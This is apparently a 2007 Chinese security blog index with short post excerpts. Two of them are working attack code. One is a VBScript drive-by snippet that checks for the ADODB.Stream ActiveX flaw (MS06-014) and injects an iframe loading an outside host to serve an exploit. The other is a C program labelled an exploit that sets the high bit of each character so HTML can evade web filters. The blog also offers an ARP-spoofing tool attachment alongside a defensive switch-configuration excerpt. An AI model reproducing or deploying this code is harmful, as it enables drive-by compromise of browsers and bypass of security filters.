Posted by amxku on 2007-02-16, 4:44 PM
Posted by amxku on 2007-02-12, 12:33 PM
Posted by amxku on 2007-02-11, 10:43 PM
<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
'msgbox "没有0614漏洞,页面转到ms07004exp!"
document.write ("<iframe src=http://1v1.name width=100% height=100% scrolling=no frameborder=0>")
else
'msgbox "存在0614漏洞,页面转到MS0614的exp!"
document.write ("<iframe src=http://1v1.name width=100% height=100% scrolling=no frameborder=0>")
end if
</script>
Posted by amxku on 2007-02-11, 12:50 AM
» 阅读全文
Posted by amxku on 2007-02-09, 2:41 PM
Tags: 生活
Posted by amxku on 2007-02-07, 5:59 PM
附件: zxarps.rar [ 10.63 K, 下载次数:332 ]
Posted by amxku on 2007-02-04, 3:45 PM
Tags: sebug
Posted by amxku on 2007-02-03, 12:04 AM
1.方案1——基于端口的MAC地址绑定
思科2950交换机为例,登录进入交换机,输入管理口令进入配置模式,敲入命令:
Switch#config terminal
#进入配置模式
Switch(config)# Interface fastethernet 0/1
#进入具体端口配置模式
Switch(config-if)#Switchport port-secruity
» 阅读全文
Posted by amxku on 2007-02-02, 1:07 AM
Tags: apache
Posted by amxku on 2007-02-01, 4:57 PM
#include <stdio.h>
int main(int argc,char** argv)
{
FILE *fp;
char ch;
printf("\n-- Bypassing of web filters by using ascii Exploit By CoolDiyer --\n");
if(argc<2){
printf("\nUsage: \n\t %s srcfile >destfile\n",argv[0]);
return -1;
}
if((fp=fopen(argv[1],"r"))==NULL){
printf("File %s open Error",argv[1]);
return -1;
}//指定编码为US-ascii是必须的
printf("\n<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=US-ascii\" />\n<title>Bypassing of web filters by using ascii Exploit By CoolDiyer</title>\n</head><body>\n");
while((ch=fgetc(fp))!=EOF){
ch|=0x80; //把7位变成8位,这句话是核心,解密时用 ch&=0x7f
printf("%c",ch);
};
fclose(fp);
printf("\n</body></html>\n");
return -1;
}